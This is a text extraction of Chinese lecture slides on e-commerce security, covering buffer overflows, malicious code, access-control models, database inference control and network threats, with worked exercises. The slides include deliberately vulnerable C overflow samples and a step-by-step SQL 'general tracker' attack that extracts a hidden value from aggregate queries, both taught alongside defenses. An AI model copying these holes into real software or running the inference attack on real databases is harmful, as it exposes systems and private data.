【文档说明】第3章_电子商务安全技术(8课时).pptx,共(187)页,973.544 KB,由精品优选上传
转载请保留链接:https://www.ichengzhen.cn/view-332910.html
以下为本文档部分文字说明:
第3章电子商务安全技术2023/9/71第3章电子商务安全技术安全目标和威胁的对象◼计算机安全包含三个重要的安全目标:机密性、完整性、可用性。◼多数威胁都是以破坏机密性、完整性和可用性为目标。◼威胁实施者主要包括:自然现象、偶然事件、无恶意的用户和恶意攻击者。◼威胁的对象主要包括软
件、硬件、数据和通信线路这四种资源。2023/9/72第3章电子商务安全技术适度安全准则◼上述三个安全目标之间可能存在彼此矛盾。◼在安全目标中找到一个恰当的平衡点。◼根据实际需要,提供适度的安全目标加以实现;◼计算机资源被保护的程度应该与它们的价值是一致的。20
23/9/73第3章电子商务安全技术机密性与可用性的平衡关系机密性可用性平衡点2023/9/74第3章电子商务安全技术第3章电子商务安全技术◼3.1程序安全◼3.2操作系统安全◼3.3数据库安全◼3.4网络安全2023/9/75第3章电子商务安全技术3.1
程序安全◼3.1.1程序漏洞◼3.1.2恶意代码2023/9/76第3章电子商务安全技术3.1.1程序漏洞三种典型的非恶意程序漏洞:◼缓冲区溢出;◼不完全输入验证;◼“检查时刻到使用时刻”错误2023/9/77第3章电子商务安全技术缓冲区溢出◼缓冲区是一个用于
存储数据并且容量有限的内存空间。1charbuffer[10];2for(i=0;i<=10;i++)3buffer[i]=‘A’;◼在数据存储过程中,若超过了缓冲区的最大容量,则将发生缓冲区溢出。◼缓冲区溢出是最为常见的一种安全漏洞。◼缓冲区溢出的位置可以出现
在任何地方,如堆栈、堆和静态数据区等。2023/9/78第3章电子商务安全技术目标程序运行时存储区的典型划分Code(代码区)Staticdata(静态数据区)Stack(堆栈)Heap(堆)用以存放目标代码,代码区长度是固定的,即编译时能确定的。它是只读的,不能存储程序变
量用以存放编译时就能确定所占用空间的数据。可用于存储程序的变量,可读写。用于保存可变数据以及管理过程活动的控制信息。2023/9/79第3章电子商务安全技术缓冲溢出(续)当出现缓冲溢出,运行的程序可能以下三种情况:◼运行正常◼被覆盖的是无用数据,并且没有发生访问违例;◼运行出错◼包括
输出错误和非法操作等;◼受到攻击,程序开始执行有害代码。◼攻击者精心设计覆盖哪些数据以及用什么数据来覆盖。2023/9/710第3章电子商务安全技术缓冲区溢出攻击方法◼攻击者可以利用缓冲区溢出漏洞,恶
意造成缓冲区溢出:◼1.将对应于机器代码指令的数据写入到缓冲区从而将攻击代码植入到被攻击程序的地址空间;◼2.攻击者通过寻求触发攻击代码的方法来获得目标系统的控制权。2023/9/711第3章电子商务安全技术获得目标系统控制权的方法获得目标系统
控制权的最常见手段:◼修改堆栈指针◼修改返回地址。2023/9/712第3章电子商务安全技术运行时的堆栈分配实参状态信息局部变量动态的局部变量分配在堆栈里面函数返回时,弹出返回地址以继续执行程序栈顶返回地址其他数据栈底2023/9/7
13第3章电子商务安全技术实参状态信息局部变量栈顶返回地址缓冲区溢出发生在堆栈空间溢出到返回地址单元,从而覆盖返回地址。攻击者通过将其所希望的返回地址写入到堆栈空间,来改变堆栈中原来的返回地址。其他数据2023/9/714第3章电
子商务安全技术stack缓冲区溢出例子voidOutputString(char*str){charbuffer[8];strcpy(buffer,str);printf("Inputis%s\n",buffer);}intmain(intargc,char**argv){Ou
tputString(argv[1]);return0;}执行命令:./stackoverflowAAAAA……2023/9/715第3章电子商务安全技术Stack溢出实例结果实参AAAA状态信息AAAAbuffer栈顶返回地址AAAAA溢出到返回地址
单元。8个字节栈底2023/9/716第3章电子商务安全技术Heap区缓冲区溢出◼Heap就是由应用程序申请动态分配的内存区。◼在编译的时候被初始化。◼目标程序运行时,对内存的动态申请是发生在Heap(堆)里的。
◼C语言可以采用malloc()从Heap中申请相应的空间,采用free()释放相应的空间;◼C++语言可以采用new()从Heap中申请相应的空间,采用delete()释放相应的空间;2023/9/717第3章电子商务安全技术Heap区缓冲区溢出实
例#include<stdio.h>#include<stdlib.h>#include<unistd.h>#include<string.h>#defineBUFSIZE16#defineOVERSIZE8/*将覆盖buf2的前
OVERSIZE个字节*/intmain(){u_longdiff;2023/9/718第3章电子商务安全技术Heap区缓冲区溢出实例(二)char*buf1=(char*)malloc(BUFSIZE);char*buf2=(char*)malloc(BUFSIZE)
;diff=(u_long)buf2-(u_long)buf1;printf("buf1=%p,buf2=%p,diff=%dbytes\n",buf1,buf2,diff);memset(buf2,'A',BUFSIZE-1);buf2[BUFSIZE-1]='\0';printf("be
foreoverflow:buf2=%s\n",buf2);memset(buf1,'B',(u_int)(diff+OVERSIZE));printf("afteroverflow:buf2=%s\n",buf2);……return0;}2023/9/719第3章电子商务安全技术溢出前He
ap区分配buf1A…A15个Abuf2/0输出结果:beforeoverflow:buf2=AAAAAAAAAAAAAAA15个A2023/9/720第3章电子商务安全技术溢出后Heap区分配B…Bbuf1BB…BA…Abuf2的前8个字节被覆盖了buf216个B7
个AB溢出到该区域/02023/9/721第3章电子商务安全技术防御手段◼基于探测方法的防御措施:返回地址“探测”值◼编程人员采用具有抵抗力的标准库◼各种方法都有局限性,因此要求人员编写无缺陷的软件。2023/9/722第3章电子商务安
全技术不完全输入验证◼当程序接受到被认为不可能出现的输入时,程序将可能会出现故障。◼避免不完全输入验证的最重要的规则就是:一个安全的程序不应该完全信任来自外界的任何输入,所有输入数据在使用之前必须要通
过合法性检查。2023/9/723第3章电子商务安全技术不完全输入验证攻击2023/9/724第3章电子商务安全技术避免不完全输入验证攻击◼加强程序的输入验证。◼注意程序设计的合理性:不应该将敏感参数处于公开状态,以避免敏感参数被恶意篡改。2023
/9/725第3章电子商务安全技术“检查时刻到使用时刻”错误◼并发进程可能会共享某些资源。◼程序所访问的资源状态可能会在某段时间内被其他进程所改变。2023/9/726第3章电子商务安全技术顺序执行程序1:X=2;X=X+1;程序2:X=5;程序2程序1输出结果:X=3输出结果:X=5202
3/9/727第3章电子商务安全技术并发执行(一)X=2X=5X=X+1程序1程序2X=?时间2023/9/728第3章电子商务安全技术并发执行(二)X=2X=5X=X+1程序1程序2X=?时间2023/9/729第3章电子商务安全技术“检查时刻到使用时刻”错误X状态S检查状态S使用状态
SY时间t1t22023/9/730第3章电子商务安全技术防御手段◼减小[t1,t2]时段内的代码大小和运行时间。◼模拟原子操作方法:将检查到使用阶段之间的所有代码作为一个临界区。2023/9/731第3章电子商务安全技术临界区域时间t1t2进入区临界区退出区2023
/9/732第3章电子商务安全技术3.1.2恶意代码◼恶意代码是以破坏为目的一类程序,它只有在执行时才造成不期望的结果。◼恶意代码包括:病毒、蠕虫、特洛伊木马和隐蔽通道等。2023/9/733第3章电子商务安全
技术病毒◼计算机病毒是一个程序◼可以将恶意代码分发到其他文件或电脑中◼具有自我复制的能力◼被感染的程序将成为新的传染源,继续传播病毒◼隐蔽性2023/9/734第3章电子商务安全技术病毒的分类◼按寄生方式分类:a)引导区病毒b)文件型病毒c)混合型病毒◼按传染途径分类:a)
驻留内存型b)不驻留内存型2023/9/735第3章电子商务安全技术引导区病毒(一)引导区其他扇区引导程序装载器系统初始化(a)感染前2023/9/736第3章电子商务安全技术引导区病毒(二)(b)感染后引导区其
他扇区引导程序装载器系统初始化病毒代码2023/9/737第3章电子商务安全技术文件型病毒◼文件型病毒以感染可执行程序为主。◼文件型病毒的安装必须借助于病毒的载体程序把文件型病毒引人内存。◼大多数文件型病毒都常驻在内存中。◼
文件型病毒会自我复制,可以感染系统中的其他程序。2023/9/738第3章电子商务安全技术蠕虫◼蠕虫是一种可以通过网络大量传播自身拷贝的恶意代码。它可以在没人干涉的情况下自动运行。◼它的自身拷贝是以独立程序的形式来传播的。而病毒的自身拷贝必须嵌入到其他程序中来
传播。2023/9/739第3章电子商务安全技术特洛伊木马◼它是一种恶意代码。◼它除了程序所具有的基本功能之外,还有一些不被人发觉的破坏行为。◼不能自行传播。病毒或蠕虫可用于将特洛伊木马作为攻击负载的一部分复制到目标系统上。2023/9/740第3章电子商务安全技术隐蔽通道◼它是一种允
许进程以危害系统安全策略的方式传输信息的通信信道。◼它可以避开系统的自主访问控制机制机制,通过一个秘密的通信路径将敏感信息传送给非法用户。2023/9/741第3章电子商务安全技术隐蔽通道敏感数据服务程序共享文件合法用户非法用户间谍进程2023/9/742第3章电子商
务安全技术隐蔽通道泄露消息100上锁(1)否:0是否上锁?是:1服务程序文件间谍进程时间时段1不上锁(0)是否上锁?服务程序文件间谍进程时段2否:0不上锁(0)是否上锁?服务程序文件间谍进程时段3为了传递不止一位的信息,服务程序和接受程序需要每个时间间隔传递一位信息。2023/9/743第3章电子
商务安全技术隐蔽通道的危害◼通道带宽:每秒传递的比特数。它可用来测量隐蔽通道传送信息的速度(危害程度)。◼带宽越大,信息的泄密速度也越快,泄密的可能性也就越大。◼容量和速度不会成为信息流的限制条件。2
023/9/744第3章电子商务安全技术预防程序漏洞的方法系统开发者可以采用软件工程提出的控制方法有效地限制开发人员的活动:a)严格的设计复查b)代码检查c)代码测试2023/9/745第3章电子商务安全技术习题P.8412023/9/746第3章电子商务安全技术3.2操作系统安全
◼操作系统提供了保护用户计算的方法,这些方法主要包括:a)访问控制b)用户鉴别/验证2023/9/747第3章电子商务安全技术访问控制用户引用监控器客体授权数据库管理人员验证访问控制2023/9/748第3章电子商务安全技术3.2.1访问控制策略当前主要有以下三种访问控制策略:a)自主访
问控制策略b)强制访问控制策略c)基于角色访问控制策略2023/9/749第3章电子商务安全技术自主访问控制◼根据主体身份控制主体对客体的访问。◼主体可以拥有将客体的访问权限自主传递给其他主体的权利;也具有自主决定从其他主体那里回收他所授予访问权限的权利。2023/9/750第
3章电子商务安全技术自主访问控制的特点◼自主访问控制的自主性为主体提供了简单、灵活的客体访问方式。◼它在一定程度上实现了多用户环境下的权限隔离和资源保护。◼易于扩展和理解,可适合于许多系统和应用。◼不能抵御特洛伊木马的攻
击。◼较难限制访问权限的传递,容易产生安全隐患。2023/9/751第3章电子商务安全技术强制访问控制◼系统中每个主体和客体均指派一个安全等级。◼强制访问控制依据主体和客体的安全等级来决定主体是否有对客体的访问权。◼中央授权系统决定哪些信息可被那些用户
访问,而用户不能改变访问权。◼访问控制策略的判决不受主体的拥有者的控制。2023/9/752第3章电子商务安全技术安全等级◼客体的安全等级通常反映了包含在客体内的信息的敏感程度。◼主体的安全等级通常反映了
主体的可信赖程度。◼安全等级构成一种偏序关系。2023/9/753第3章电子商务安全技术保护信息机密性的原则◼向下读:主体的许可级别至少和所读客体的安全等级一样高。◼向上写:主体的许可级别不能高于所修改客体的安全等级。2023/9/754第3章电子商务安全
技术信息机密性向高上写安全等级向写下读读低S2O3O2O1S41级2级3级4级2023/9/755第3章电子商务安全技术例:◼系统中有用户U1、U2、U3、U4、U5,有文件F1、F2、F3、F4、F5;采用基于安全等级的强制访问控制策略,安全等级如下(级数越大安全级别越高):3级:U1、
F12级:U3、F3、U51级:U2、U4、F2、F4、F5请分别列出U1、U2、U3、U4、U5能读哪些文件、能写哪些文件2023/9/756第3章电子商务安全技术例:◼U1能读:F1、F3、F2、F4、F5;能写
:F1◼U2能读:F2、F4、F5;能写:F2、F4、F5、F3、F1◼U3能读:F3、F2、F4、F5;能写:F3、F1◼U4能读:F2、F4、F5;能写:F2、F4、F5、F3、F1◼U5能读:F3、F2、F4、F5;能写:F3、F12023
/9/757第3章电子商务安全技术“向上写”的原则局限◼“向上写”的原则使得低安全等级的主体破坏高安全等级客体内的敏感数据成为可能,它忽略了数据的完整性。◼它限制了高安全等级主体向非敏感客体写数据的合理要求,降低了系统的可用性。2023/9/
758第3章电子商务安全技术完整等级◼和客体关联的完整等级反映了对存储在客体内信息的信赖程度以及由于对这些信息的非授权修改而引起的潜在损害程度,它反映了客体对修改操作的敏感等级。◼和主体关联的完整等级反映了主体对相应级别客体进行修改操作的可信赖等级。2023/9/759第3章电子商务安全技术保护信
息完整性的原则◼向上读:主体的完整等级不能高于所读取客体的完整等级。◼向下写:主体的完整等级至少和所修改客体的完整等级一样高。2023/9/760第3章电子商务安全技术信息完整性向高上读完整等级向写下读写低O4O3S1O2S3
1级2级3级4级2023/9/761第3章电子商务安全技术例:◼系统中有用户U1、U2、U3、U4、U5,有文件F1、F2、F3、F4、F5;采用基于安全等级的强制访问控制策略,完整等级如下(级数越大完整性级别
越高):3级:U1、F12级:U3、F3、U51级:U2、U4、F2、F4、F5请分别列出U1、U2、U3、U4、U5能读哪些文件、能写哪些文件?2023/9/762第3章电子商务安全技术例:◼U1能写:F1、F3、F2、F4、F5;能读:F1◼U2能写:F2、F4、F5;能
读:F2、F4、F5、F3、F1◼U3能写:F3、F2、F4、F5;能读:F3、F1◼U4能写:F2、F4、F5;能读:F2、F4、F5、F3、F1◼U5能写:F3、F2、F4、F5;能读:F3、F12023/9/763第
3章电子商务安全技术强制访问控制的优点和不足◼能够防止特洛伊木马和隐蔽通道的攻击。◼它适合于通过权威中心进行严格访问控制的环境,可以防范用户滥用权限。◼缺乏灵活性,应用的领域也比较窄,一般只用于军方等具有明显等级观念的行业或领域。2023/9/764第3章电子商务安全技术强
制访问控制防止隐蔽通道攻击敏感数据服务程序共享文件合法用户非法用户间谍进程安全等级高低2023/9/765第3章电子商务安全技术MAC和DAC的不足◼它们主要是直接在用户和客体的访问权限之间建立授权关系。◼针对用户个体或用户组的权限管理负担巨大、可操作性和可管理性较低,
容易出错。2023/9/766第3章电子商务安全技术基于角色访问控制U用户R角色P权限用户-角色分配角色-权限分配角色层次2023/9/767第3章电子商务安全技术RBAC的特点◼实现了用户和访问权限的逻辑分离,用户通过角色获得其享有的权
限,而不是直接将权限授予给用户。◼可以通过改变用户与角色的关联而方便地改变用户的访问权限。◼适合大型多用户管理信息系统的授权管理。◼容易实施最小特权原则。2023/9/768第3章电子商务安全技术3.2.2访问控制实现技术◼访问控制决定了每个主体对客体的访问权限。◼描述主体对客体访问权限的最为
方便的方法就是采用访问控制矩阵。◼访问控制的任务就是确保每个主体只能执行那些被访问控制矩阵授权的操作。2023/9/769第3章电子商务安全技术访问控制矩阵客体主体MyFileMyFile1PrinterUSER_AReadExecute
ReadWriteUSER_BReadOwnerReadWrite2023/9/770第3章电子商务安全技术访问控制矩阵的实现◼访问控制矩阵将占用巨大的存储空间。◼访问控制矩阵为稀疏矩阵。◼访问控制矩阵实现:a)访问控制表b)访问能力表c)授权关系2023/9/771第3章
电子商务安全技术访问控制表ACL客体名用户名访问权限USER_AReadExecuteUSER_BReadExecuteWriteOwner*Read访问控制表Myfile2023/9/772第3章电子商务安全
技术例:◼已知文件Myfile的访问控制表如下。求USER_A、USER_B和USER_C对文件Myfile的访问控制权限。客体名用户名访问权限USER_AReadExecuteUSER_BReadExecuteWrite
Owner*Read访问控制表Myfile2023/9/773第3章电子商务安全技术例:◼USER_A对Myfile的访问控制权限为读/Read、执行/Execute◼USER_B对Myfile的访问控制权限为:读/Read、执行/Execute、写/Write
、拥有/Owner◼USER_C对Myfile的访问控制权限为:读/Read2023/9/774第3章电子商务安全技术访问控制表特点◼容易回收某个客体的所有访问权限。◼若希望查找或回收某个主体的所有访问权限时,则需要查找系统中所有客体的访问控制表。◼多数集中式操作系统
使用ACL方法或类似方式。2023/9/775第3章电子商务安全技术访问能力表CL主体名客体名访问权限MyFileReadExecuteMyFile1Read访问能力表USER_A类型文件文件Printe
rWrite打印机2023/9/776第3章电子商务安全技术例:◼则U1对F1的访问权限为()、对F2的访问权限为()、对F3的访问权限为()。主体名访问能力表客体名访问权限类型F1R文件F2R、W文件F3R、W、X、O文件U1◼访问能力表如下:2023/9/77
7第3章电子商务安全技术例:◼读或R读,写或RW读,写,执行,拥有或RWXO2023/9/778第3章电子商务安全技术访问能力表的特点◼回收某个客体的所有访问权限不容易。◼当系统删除某个客体时,则需要查找每个主体的访问能力表。◼分布式系统也较难为某个客体指定它潜在的主体集。因此在现代
操作系统中访问能力表得到了广泛的应用。2023/9/779第3章电子商务安全技术授权关系(表)主体访问权限客体USER_AReadExecuteMyFileUSER_AReadMyFile1USER_AWritePrinterUSER_BR
eadOwnerMyFile2023/9/780第3章电子商务安全技术3.2.3Unix操作系统的文件保护机制◼主体划分为三个等级:a)文件所有者b)用户组:用户组成员是根据对资源的共享需求而组合起来的,组内各成员之间也存在着彼此的信任关
系c)其他用户。◼每个文件只有一个所有者2023/9/781第3章电子商务安全技术文件所有者◼文件所有者可以定义用户本人对该文件的访问权限。◼文件所有者可以随时定义或撤销其他用户的访问权限。◼文件的访问权限由文件属性
决定。2023/9/782第3章电子商务安全技术文件属性◼文件属性包括文件许可、文件所有者、文件相关组名、文件长度、文件名。◼文件许可分为以下4部分:drwxrwxrwx文件类型所有者的访问权限用户组的访问权限其他用户访问权限2
023/9/783第3章电子商务安全技术GroupA文件访问控制MyFile文件属性:-rwxr-xr--UserBGroupA所有者名文件许可文件相关组名UserAUserB访问2023/9/784第3章电子商务
安全技术例:◼在Unix系统中,文件f1的属性如下:-rwxr-xr――UserBGroupB1024f1用户UserA在属于用户组GroupA,用户UserB和UserC属于用户组GroupB。求用户UserA、UserB和UserC对文件f1的访问权限。202
3/9/785第3章电子商务安全技术例:◼UserA:RUserB:R、W、XUserC:R、X或UserA:读UserB:读、写、执行UserC:读、执行2023/9/786第3章电子商务安全技术目录ABfile目录许可子目录许可文件许可20
23/9/787第3章电子商务安全技术习题P.845,72023/9/788第3章电子商务安全技术3.3数据库安全◼3.3.1数据库管理系统◼3.3.2安全需求◼3.3.3数据库访问控制◼3.3.4完整性约束◼3.3.5推理控制◼3.3.6秘密通道◼3.3.7数据库加密◼3.3.8数据库用户管理
2023/9/789第3章电子商务安全技术3.3.1数据库系统应用程序数据库管理系统DBMS数据库数据库管理员a)共享的数据集合b)按指定的组织形式保存实现数据库系统的各种功能负责数据库的规划、设计、协调、维护和管理202
3/9/790第3章电子商务安全技术关系数据库◼关系数据库是表或者关系的集合◼关系是通过关系模式来描述的,关系包括关系名、组成该关系的属性名等。◼如客户信息表的关系模式:Customer(UID,Name,Address)◼数据库中所有关系模式的集合,构成
了数据库模式2023/9/791第3章电子商务安全技术关系实例UIDName050102张华客户表Customer:元组属性分量属性的域为char(50)Address广东路2023/9/792第3章电子商务安全技术客户基本信息表Cu
stomerUIDNameAddress050101李其上海路050102张华广东路050103赵伟北京路050104孙林江苏路2023/9/793第3章电子商务安全技术订单信息表OrderIDUIDPID
PriceBIDAccount1050101A330101012050102B560202013050103C450202024050104B500202035050102A400202016050103B560202027050102C500202
018050104C450101022023/9/794第3章电子商务安全技术3.3.2数据库安全需求◼数据库的物理完整性:预防数据库中的数据不会受到物理方面故障的影响,能够重构遭受到破坏的数据库。◼数据库的逻辑完整性:保护数据库的
逻辑结构。◼可审计性:能够跟踪用户对数据库中数据的访问或修改活动。2023/9/795第3章电子商务安全技术数据库安全需求(续)◼用户验证:每个用户访问数据库之前,必须要通过系统的身份验证。◼访问控制:控制用户的访问权限,确保用户只能读取或修改被授权的数据。◼可用性:
保证用户可以访问数据库中的授权数据。但数据库中的数据并不是任何用户在任何时候都可以访问的。需要注意的是:防止出现拒绝服务的现象。2023/9/796第3章电子商务安全技术3.3.3数据库访问控制◼它可以使用户访问一些公共的
数据集。◼数据库系统必须能够限制各个用户的访问范围。操作系统数据库数据对象独立的对象数据对象之间存在语义关系推理攻击不容易可以颗粒度大更小2023/9/797第3章电子商务安全技术3.3.3数据库访问控制DBMS可以采用授权表保存数据库用户对数据对象的访
问权限。用户标识数据对象访问权限表、视图、属性2023/9/798第3章电子商务安全技术视图◼视图是它是基本表或视图的一个子集◼它不同于基本表,只是一个虚表。◼数据库管理员可以利用视图限制用户的访问范围。表导出视图视图2023/9/
799第3章电子商务安全技术视图例子——客户基本信息表CustomerUIDNameAddress050101李其上海路050102张华广东路050103赵伟北京路050104孙林江苏路2023/9/7100第
3章电子商务安全技术视图例子——订单信息表OrderIDUIDPIDPriceBIDAccount1050101A330101012050102B560202013050103C450202024050104B500202035050102A400202016050103
B560202027050102C500202018050104C450101022023/9/7101第3章电子商务安全技术视图例子——送货视图view1IDPIDUIDNameAddress1A05
0101李其上海路2B050102张华广东路3C050103赵伟北京路4B050104孙林江苏路5A050102张华广东路6B050103赵伟北京路7C050102张华广东路2023/9/7102第3章电子商务
安全技术3.3.4完整性约束完整性约束描述了数据对象的约束条件。它主要分为以下两类:◼静态约束是对数据库状态的约束。它可以限制属性值的域以及属性值的唯一性,也可以限制属性之间的关系。◼动态约束描述了数据库从一个状态转换为另一个状态的约束,它由应用程序员显式地定义。2023/9
/7103第3章电子商务安全技术完整性约束的检验◼完整性约束的检验是伴随着数据库插入或更新操作进行的。如:UpdateAccountsetbalance=balance–20whereaccountID=1;◼DBMS将拒绝不满
足完整性约束的所有数据库插入或更新操作。2023/9/7104第3章电子商务安全技术3.3.5推理控制◼推理是指用户通过间接的方式获取其不该访问的数据。◼推理控制的目的就是防止用户通过推理方式来窃取敏感数据。2023/9/7105第3章电子商务安全技术存在和缺失◼存在和缺失透露敏
感数据项的存在以及该数据项和屏幕上其他数据的关联信息。客户标识客户名地址信用度050101李其上海路*050102张华广东路*缺失2023/9/7106第3章电子商务安全技术直接攻击攻击者可以通过直接查询敏感属性并根
据返回的少量元组来获取敏感属性值。如:SelectUIDfromOrderwhereAccount=0201andPID=‘B’查询结果:CustomID050102敏感域2023/9/7107第3章电子商务安全技术逻辑或代数运算利用非敏感数据和敏感数据之间的语义关联,并通过逻
辑或代数运算推断出用户不可访问的数据。消费金额范围客户等级敏感数据非敏感数据2023/9/7108第3章电子商务安全技术统计推理统计攻击就是攻击者根据收集到的线索或数据特征,利用各种统计方法推断出个体数据中的敏感信息。线索或数据特征统计推理统计数据敏感信息
2023/9/7109第3章电子商务安全技术统计推理实例NameSalaryOccupationZhang3000经理Li2000员工Zhao1000员工STAT表2023/9/7110第3章电子商务安全技
术通用追踪器通用追踪器是一个谓词T,它满足下面的条件:)(TSET)2(|)(|2bnTSETb−:为谓词T所限定的元组集合|)(||)(|TSETTNOTSETn+=b为每个查询结果的最少元组数2023/9/7111第3章电子商务安全技
术通用追踪器——原理SET(T)SET(NOTT)abdecSET(P)={bc})()(_TNOTORPSETTORPSETB=)()()(TNOTSETTSETBPSET−−=2023/9/7112第3章电子商务安全技术通用追踪器——
找出一个通用追踪器T的方法试探一个通用追踪器T2b<=|Set(T)|<=(n-2b)确定通用追踪器TYesNo2023/9/7113第3章电子商务安全技术通用追踪器——推理过程分别查询Set(T)和Set(NotT)的统计数据查询Set(PORT)的统计数据查询Set(POR
NotT)的统计数据利用获得统计数据,计算Set(P)的结果2023/9/7114第3章电子商务安全技术通用追踪器实例(一)IDPIDPriceBID1A33012B56023C45024B50025A40026B56027C50028C4501已知P为:PID
=”A”andBID=”01”2023/9/7115第3章电子商务安全技术通用追踪器实例(二)先用谓词ID<5来试探,以找出通用追踪器T。Q1:SelectCount(*)fromOrderwhereID<5;结果:4
Q2:SelectCount(*)fromOrderwhereNOT(ID<5);结果:4当b=2时,Q1、Q2的查询结果满足条件(n=4+4=8):2b<=|SET(T)|<=(n-2b)所以ID<5可以作为通用追踪器。2023/9/7
116第3章电子商务安全技术通用追踪器实例(三)Q3:SelectSUM(Price)fromOrderwhere(PID=”A”andBID=”01”)ORID<5;结果:184Q4:SelectSU
M(Price)fromOrderwhere(PID=”A”andBID=”01”)ORNOT(ID<5);结果:224Q5:SelectSUM(Price)fromOrderwhereID<5;结果:184Q6:SelectSUM(Price)fromOrderwhereNOT(ID<5);
结果:191根据通用追踪器计算公式可得到price=184+224–184-191=33。2023/9/7117第3章电子商务安全技术Account表在某一时刻的内容如下:账号银行名存款余额aidbn
amebalance1001中国银行1002001工商银行2001002中国银行5003001建设银行2004001农业银行3001003中国银行2001004中国银行3003002建设银行100balance列不能直接查询,且统计查询的行数C满足:2≤C≤n-2;采用通用追踪器求aid=
1001的存款余额balance。2023/9/7118第3章电子商务安全技术防御推理攻击当前防御推理攻击较为实用的技术大致包括:◼采样法◼数据扰乱◼禁止明显的敏感数据◼查询控制2023/9/7119第3章电
子商务安全技术采样法数据库样本数据统计结果随机抽取统计近似值应该选取足够的样本。2023/9/7120第3章电子商务安全技术数据扰乱◼数据扰乱是指只用一个随机数据修改数据库表中的某个属性值,从而使最终的统计数据接近真实值,
而又不是精确值。姓名工资zhang3000+ѡLiu2000+ѡSTATѡ为随机数统计结果统计近似值2023/9/7121第3章电子商务安全技术禁止明显的敏感数据◼隐藏或者不显示特定存储单元的内容,拒绝那些涉及敏感域的查询,防止这些信息被用
来进行推理攻击。◼缺点:可能会拒绝许多合理的查询,降低了数据的可用性。2023/9/7122第3章电子商务安全技术查询控制◼主要是对查询结果中的元组数进行控制。◼返回的元组数results∊[k,n-k]◼缺点:◼无法防止多个攻击者通过组合已知的查
询结果窃取数据的情形。◼无法防止一个攻击者通过组合当前的查询结果和历史的查询结果窃取数据的情形。2023/9/7123第3章电子商务安全技术3.3.6秘密通道更新处理元组封锁搜索处理查询正在进行更新低安全等级的处理应该不能够区分系
统中是否存在一个高安全等级的处理。2023/9/7124第3章电子商务安全技术3.3.7数据库加密数据库管理系统数据库的文件窃取存储攻击2023/9/7125第3章电子商务安全技术数据库加密的基本要求(一)◼性能要求:加密处理过程不应导致数据库系统性能的明显降低。◼对合法用户操
作的影响:加密系统对合法用户的操作应该是透明的。◼密钥管理:与一般的加密系统相同,要求密钥管理机制,并要求更加灵活和坚固。2023/9/7126第3章电子商务安全技术数据库加密的基本要求(二)◼对加密强度的要求:数据库数据的加密技术对强度的要求是最主要的。◼
合理加密数据:加密方法要保证密文的数据类型不会改变,密文也只能在该属性的域内,密文长度也不能超过该属性限定的长度。尽量不增加数据文件所需的存储空间。2023/9/7127第3章电子商务安全技术数据库加密技术限制◼数据库关系运算的比较属性不宜加密◼表间连接码
属性不宜加密◼索引属性不宜加密。◼数据库数据加密会影响DBMS的一些功能。比如SQL语言中Select语句中的分组(groupby)、排序(orderby)、分类(having)子句以及完整性约束条件均不能直接作用于密文数据。2023/9/7128第3
章电子商务安全技术数据库加密层次应用层加密数据库层加密文件/存储层加密密文明文2023/9/7129第3章电子商务安全技术应用层加密◼应用层加密允许企业在应用逻辑中选择加密粒度以及加/解密在应用逻辑中的位置。数据库服务器应用数据库密文密文2023/9/7130第3章电子商务安全技术应用层加密
优势和限制◼优势:可以防御攻击者实施的存储攻击以及对数据库管理系统进行的攻击。◼限制:◼在应用的设计和实现阶段,开发者就必须确定应用需要访问哪些加密数据。◼要求访问加密数据的所有应用都能够支持加解密处理。◼应用层加密数据将影响到存储过程和触发器这类数据库对象的执行
,从而使得应用层的加密功能受到一些限制。2023/9/7131第3章电子商务安全技术数据库层加密◼所有数据的加/解密及密钥管理工作都在数据库管理系统内进行,它可以和数据库的访问控制自然结合,以抵御对数据库实施的各种攻击。◼数据库层加密避免了对
应用的影响。◼加密粒度可以选择:表、元组、属性◼但由于加密数据与加密密钥信息同时放在数据库中,因此对加密密钥的管理带来了极大的困难,同时也加重了数据库服务器的负载。2023/9/7132第3章电子商务安全技术文件/存储层加密◼
文件/存储层加密是在文件层次或在块的层次上对存储子系统内的数据进行加密。◼对于这种依赖于操作系统进行数据管理的数据库管理系统,文件/存储层加密是这些数据库通常采用的策略。数据库管理系统加/解密数据处理数据文件明文密文2023/9/7133
第3章电子商务安全技术文件/存储层加密限制◼它只能防御对存储系统的攻击。◼当前的存储安全机制只能提供块级加密,不能够在应用或数据库内向企业提供字段级的加密◼这种方法只能加密整个数据库或数据表,而不能只对数据库内特定信息加密。◼DBMS在查找数据时必须要对全部数据进行解密操作,系统常常需要付出较大的
时空代价。2023/9/7134第3章电子商务安全技术3.3.8数据库用户管理◼普通数据库用户:它的访问权限最低,按照授权可以查询、删除或更新数据库的数据。◼具有支配部分数据库资源特权的用户:它可以授予或收回其他数据库用户对其所创建的数据对象的访问
权限。◼具有DBA特权的数据库用户:DBA拥有控制整个数据库资源的特权,它不但可以动态授予或收回数据库其他用户对数据对象的访问权,还提供对其他数据库用户的注册、注销功能。2023/9/7135第3章电子商务安全技术分割DBA的权限的必要性◼数据库管理员
拥有访问数据库并执行大部分数据库管理操作的特权。◼数据库管理员仍可以通过其管理员的特权修改用户口令,并假冒其他用户访问数据库数据。◼限制DBA的权限:由几个用户共同来完成系统管理的工作,其中一种解决方法就是设立安全管理员。2023/9/7136第3章电子商务安全技术安全管理员安全管理员
DBA增加或删除用户通常的DBA任务具有用户管理权限具有通常数据库管理功能2023/9/7137第3章电子商务安全技术习题P.85:8,10,112023/9/7138第3章电子商务安全技术3.4网络安全◼各种电子商务业务可以通过Inte
rnet进行。◼Internet是一个开放的、无控制机构的网络。◼网络安全问题成为各种网络服务和应用能否进一步发展的关键问题之一。◼网络安全是信息系统安全的基础。◼网络安全:确保网络数据的可用性、完整性和保密性。2023/9/7139第3章电子商务安全技术3.4网络安全◼3.4.1
网络的安全威胁◼3.4.2虚拟专用网络◼3.4.3防火墙◼3.4.4入侵检测系统2023/9/7140第3章电子商务安全技术3.4.1网络的安全威胁——端口扫描◼信息收集是突破网络系统的第一步。信息收集
的一种简单方法是采用端口扫描。◼端口扫描器程序是一个可自动检测并初步分析远程或本地主机安全性弱点的程序。请求响应消息发现目标主机类型和相应漏洞端口扫描器程序2023/9/7141第3章电子商务安全技术窃听
AB嗅探器被动窃听:攻击者只是截取通信数据,然后综合分析截获的数据以获取敏感信息。主动窃听:攻击者在截取通信数据之后,还要在截获的信息中注入他自己的信息。2023/9/7142第3章电子商务安全技术假冒◼假冒是另外一种截取网络信息的方法,它是指一个
实体冒充另一个合法的实体。◼攻击者要想冒充一个合法的用户,他首先试图窃取该主机的一个账号和密码。◼获得普通用户账号的方法:Finger命令、默认账户。◼破译用户的密码的方法:字典穷举法、默认账号的默认口令、通过窃听技
